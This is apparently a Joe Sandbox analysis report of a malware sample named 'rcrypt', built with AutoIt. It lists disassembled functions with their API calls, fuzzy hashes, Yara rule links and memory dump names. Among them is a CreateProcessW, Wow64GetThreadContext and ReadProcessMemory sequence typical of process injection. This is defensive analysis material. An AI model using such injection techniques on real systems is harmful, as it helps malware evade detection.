API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 8f0142fcf2ad61d82fd9bffa00e05d2ac03c94d179ad951e46275d7147eb8185
Instruction ID: 874169f00e267624ed70d1b1424034f60c9cc1e9ee0195a8a64e96d747db5b1c
Opcode Fuzzy Hash: 8f0142fcf2ad61d82fd9bffa00e05d2ac03c94d179ad951e46275d7147eb8185
Instruction Fuzzy Hash: 9DF0F43590025DB6CB29BE98ED019DFBBE99F14350F204535F904A2181DFB18BC0C6E1

Function 0011582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0011585C
__lock_file.LIBCMT ref: 0011587D

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 7d972b5e9374a8c79d9bc5020c60d3fef8d18bea398c23824c0e762d218d07c1
Instruction ID: 9a639993686ff95061646cf5fc186802679a94da47046ebac4b362a34c0a8169
Opcode Fuzzy Hash: 7d972b5e9374a8c79d9bc5020c60d3fef8d18bea398c23824c0e762d218d07c1
Instruction Fuzzy Hash: 96018871800A05EBCF19AF6A8C015DE7B62AF91360F148235B8145A161DB3186A1DB91

Function 001155D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68

__lock_file.LIBCMT ref: 0011561B

Part of subcall function 00116E4E: __lock.LIBCMT ref: 00116E71

__fclose_nolock.LIBCMT ref: 00115626

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: bbe6e048c9f433f60888c45f6518a53b8fc33ab407e49b4582b1480bf4f4d34c
Instruction ID: 75e1afff900b1a926edf90bbbee637360259f6d2b4d65d7297b594f8d7209795
Opcode Fuzzy Hash: bbe6e048c9f433f60888c45f6518a53b8fc33ab407e49b4582b1480bf4f4d34c
Instruction Fuzzy Hash: 30F02B71804B00DAD72CAF7588027DE77E21F91334F658225A410AB0C1CF7C49C1CB95

Function 016F129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 016F1ACD
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016F1AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016F1B13

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction ID: c29da20dfcf01392508bf168ab976f4dcf9d9353311e009678f221584dfce8b8
Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
Instruction Fuzzy Hash: D612DD24E24658C6EB24DF64D8507DEB232EF68340F1090ED910DEB7A5E77A4E81CF5A

Function 00102123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bf3a12340a08c955162831526335d4b08ec4cc321f34fb96898efd5c237cc12
Instruction ID: f44d9b528a67375c24616bfd83d05aa41f852920b1128c206707e1aea15c74a6
Opcode Fuzzy Hash: 7bf3a12340a08c955162831526335d4b08ec4cc321f34fb96898efd5c237cc12
Instruction Fuzzy Hash: B651A135600604AFCF18EB64CD96FBE77A6AF49314F158068FA46AB392CB70ED00DB51

Function 000F766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000F774A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 270eceb12a96a73d3ff24fe8e99f789d393aac14128276be90c1ddf2aac185e9
Instruction ID: cba2000290b9dd593cf672292ba7a452ce04a890f52e65e355d2a877417a70f4
Opcode Fuzzy Hash: 270eceb12a96a73d3ff24fe8e99f789d393aac14128276be90c1ddf2aac185e9
Instruction Fuzzy Hash: 3431A279608A06DFC728AF18D490975F7E0FF08310714C569EA8ECBB65E770D881DB86

Function 000F5C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 000F5CF6

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 18537ed2a82ae2ccc2f2f32811352c977c9c6b0577045eab70d7731457740a1a
Instruction ID: c3488b5b51ff1f938d71e9471b3322269bf93ff5c38868bef9c7db5f20d0eb68
Opcode Fuzzy Hash: 18537ed2a82ae2ccc2f2f32811352c977c9c6b0577045eab70d7731457740a1a
Instruction Fuzzy Hash: C7314F71A00B19AFCB18DF2DC8846ADB7B5FF48311F148629DA1993B10D771B960EBD0

Function 001300D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 001300E1

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 9764c95ec120964444a670ff4770a8adace9a4d353e7dd7710a8ab2c8083d6b2
Instruction ID: 0f1beeaf305b2bd541983d5390e68d7549f1b5f3990f66b5aa36779c67618221
Opcode Fuzzy Hash: 9764c95ec120964444a670ff4770a8adace9a4d353e7dd7710a8ab2c8083d6b2
Instruction Fuzzy Hash: AA410BB4604345DFDB25DF14C494B2ABBE0BF49314F1988ACE5898B762C335E885DF52

Function 000F4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F4D13: FreeLibrary.KERNEL32(00000000,?), ref: 000F4D4D

Part of subcall function 0011548B: __wfsopen.LIBCMT ref: 00115496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4F6F

Part of subcall function 000F4CC8: FreeLibrary.KERNEL32(00000000), ref: 000F4D02

Part of subcall function 000F4DD0: _memmove.LIBCMT ref: 000F4E1A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: ec69f4cfd75368d282e0b233251596eecab8a0f5884f5d57111402ca8cc041ab
Instruction ID: 5b7df42c2020a891fd0f83d2d6b78c9fbd5bf2286616ddcae8420f9df0d7bb92
Opcode Fuzzy Hash: ec69f4cfd75368d282e0b233251596eecab8a0f5884f5d57111402ca8cc041ab
Instruction Fuzzy Hash: A611E33160060DAACB24AF70DC46BFF77A99F40711F10842DFB49A69C3DF759A15ABA0

Function 001301AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 001301BB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: d281a1f95e2d4d1000993ebd03398437e9f62b3517df632efdbf131fbb3fd3c3
Instruction ID: ddc2a2667da43a0ae78f229fbf2d8257c3f4e7bc392bfdb10faa333d11900019
Opcode Fuzzy Hash: d281a1f95e2d4d1000993ebd03398437e9f62b3517df632efdbf131fbb3fd3c3
Instruction Fuzzy Hash: 032135B4A08345DFCB24DF14C444B6ABBE0BF89314F05896CFA8A57B21C731E845DB52

Function 000F5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,000F5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 000F5D76

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4705a91b01dc7ac733b4a0ffcc16be915000c7c88c4f4ad46126b5588636ab11
Instruction ID: f09b0f7df669c07f26e943bab559f59db3fcf491af387e4b41bb6bffce62b214
Opcode Fuzzy Hash: 4705a91b01dc7ac733b4a0ffcc16be915000c7c88c4f4ad46126b5588636ab11
Instruction Fuzzy Hash: 0B116631201B089FD3308F05C888B66B7E8EF44721F14C92EE6AA86A50D7B0E945DF60

Function 000F7F41 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 000F7F82

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 655c4edcc936791763e04923be4c22679df8ae5058c891d1c595f59b22235dd7
Instruction ID: 0e307d1266ee019ccc1df7c16d61cc52e35cbb0620a43ebc05f4c5fe8c1b86ec
Opcode Fuzzy Hash: 655c4edcc936791763e04923be4c22679df8ae5058c891d1c595f59b22235dd7
Instruction Fuzzy Hash: 200126726043057ED3249B38CC02FB7BBA4AB48760F10853EFA1ECA190EB71E4809790

Function 00114A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00114AD6

Part of subcall function 00118D68: __getptd_noexit.LIBCMT ref: 00118D68

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 7c7820a63f0de33e7722c9a7f2574c547e42e3ca5bb45ac5e73bfadf0dc32eeb
Instruction ID: 65799b4985db4e85b2d4216af2062f9a2e9afe94b7163cda27757082e301f7ff
Opcode Fuzzy Hash: 7c7820a63f0de33e7722c9a7f2574c547e42e3ca5bb45ac5e73bfadf0dc32eeb
Instruction Fuzzy Hash: D9F02231800209ABDF69AF74CC023DF36A0AF10725F058134F424AB0D1CB788AD1CF99

Function 000F4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,001B62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000F4FDE

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 79476ae5c549fe91620a3cd945c3a415d88805ba8d7ba68773821f6c849d557d
Instruction ID: 8d7cfc54b58442f2b8bdea016f18422b95b21721d83da407ab89cf417147ed17
Opcode Fuzzy Hash: 79476ae5c549fe91620a3cd945c3a415d88805ba8d7ba68773821f6c849d557d
Instruction Fuzzy Hash: 85F01C7150571ACFC7749F64E494827BBF1BF143253208A3EEADA82A10C7319888EB50

Function 001109D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: 9f52941274f2ea8e9198b1bbbddff05b2d6e9c69bcba330c58cfb2bccfbf3be6
Instruction ID: fbfcf260f2b8732f159d6542fd8447c04841e5e7590f95e97a14976951f7f3cd
Opcode Fuzzy Hash: 9f52941274f2ea8e9198b1bbbddff05b2d6e9c69bcba330c58cfb2bccfbf3be6
Instruction Fuzzy Hash: 8DE0CD3690422C57C720D6589C05FFA77FDDF88790F0401B5FD0CD7215D9609CD18691

Function 00159129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0015914B

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction ID: bc22df5db0ee366523990fdbe911dc47b539c911a4129fac5d9ab11ff5ca3385
Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
Instruction Fuzzy Hash: DAE092B0104B00DFD7388A24D8507E373E1AB16315F00081CF6AA87341EB6278458B59

Function 0011098A Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001109F4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 259fc9d3ceae97b582e2f5da896be292e0e71e2f24735053c307c563dd1443a6
Instruction ID: 927bfe6f6a6f083c7152bdbd9b6163ec1fc0541296b0ea898156cd6872b0cc1f
Opcode Fuzzy Hash: 259fc9d3ceae97b582e2f5da896be292e0e71e2f24735053c307c563dd1443a6
Instruction Fuzzy Hash: 3DD02B739000184F87208668E801AF43369DB4922070402E9FC0CC7117C9604C818680

Function 000F5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,0012E16B,?,?,00000000), ref: 000F5DBF

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7b277a992631e650a3004ed1d930a722ad978bed14ba79f6de9cbbc28f285916
Instruction ID: 4bc575f2160a7c7783bf7c42f6642829e73368a2bdf447912773e99d28ae4756
Opcode Fuzzy Hash: 7b277a992631e650a3004ed1d930a722ad978bed14ba79f6de9cbbc28f285916
Instruction Fuzzy Hash: 1AD0C77464020CBFE710DB80DC46FAA777CE705710F500194FD0456690D6B27D908795

Function 0011548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00115496

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: c8c77840a47c664caa81f564794db8fbfd9d72ac46931c5a7ff20c1c3d0a6ff5
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 73B0927684020CB7DF012E82EC02A993B1A9B90678F808020FB0C18562A673A6A09689

Function 0015D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0015D46A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: f8f93667fcf1f43d14f1f7487bf3d753160b223b3ac63459df3ee83e2726f752
Instruction ID: 67953247ed1ece6889d6733f0f2ebf172ed5eb3a5046699dbb47a2cb8da9f265
Opcode Fuzzy Hash: f8f93667fcf1f43d14f1f7487bf3d753160b223b3ac63459df3ee83e2726f752
Instruction Fuzzy Hash: A7717330208705CFC714EF24D491AAAB7E0BF88315F04456DFAA68B6A2DB70ED49DB53

Function 00110E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00110EF7

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 13b12f3aab1e64ee96384f7eeeb5c8730ca14356c794b880665f9ecb9f02b510
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: E931D370A01106DBC71EDF59C4809A9F7A6FF5D300B658AA9E409CB651E7B1EEC1CBC0

Function 016F229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 016F22B1

Memory Dump Source

Source File: 00000000.00000002.1319460756.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16f0000_rcrypt.jbxd

Similarity

